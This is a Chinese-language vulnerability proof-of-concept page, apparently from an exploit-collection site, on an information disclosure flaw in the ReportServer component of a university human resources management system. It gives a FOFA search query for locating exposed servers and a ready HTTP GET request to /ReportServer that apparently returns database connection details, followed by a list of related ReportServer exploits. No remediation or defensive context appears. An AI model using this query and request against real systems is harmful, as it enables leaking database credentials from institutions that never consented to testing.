高校人力资源管理系统ReportServer存在敏感信息泄露漏洞

漏洞描述

PoC代码

# 高校人力资源管理系统ReportServer存在敏感信息泄露漏洞

高校人力资源管理系统ReportServer存在敏感信息泄露漏洞



## fofa

```javascript

body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"

```



![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729414884399-6be61b88-4e82-42e2-bfb0-451f6e130f92.png)



## poc

```java

GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1

Host: 

User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36

Accept-Encoding: gzip, deflate

Accept: */*

```



![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729415182606-37ca16b7-4b31-40ae-b37a-7350c1af4d59.png)

相关漏洞推荐

• POC seeyon-fanruan-report-server-directory-travesal: 致远OA 帆软组件 ReportServer 目录遍历漏洞
• 高校人力资源管理系统 /ReportServer 信息泄露漏洞
• 帆软报表 ReportServer 存在模板注入漏洞
• 帆软FineReport /ReportServer 命令执行漏洞
• 帆软 ReportServer 远程代码执行漏洞
• 帆软 ReportServer 远程代码执行漏洞
• 帆软报表 /view/ReportServer 远程代码执行漏洞
• 致远OA帆软报表 /seeyonreport/ReportServer 文件上传漏洞
• 帆软报表 ReportServer 存在任意文件读取漏洞
• POC 正方教学管理信息服务平台ReportServer存在任意文件读取漏洞
• 正方教学管理信息服务平台 ReportServer 任意文件读取漏洞
• 海康iVMS-8700综合安防管理平台ReportServer任意文件读取
• 致远OA 帆软组件 ReportServer 路径存在目录遍历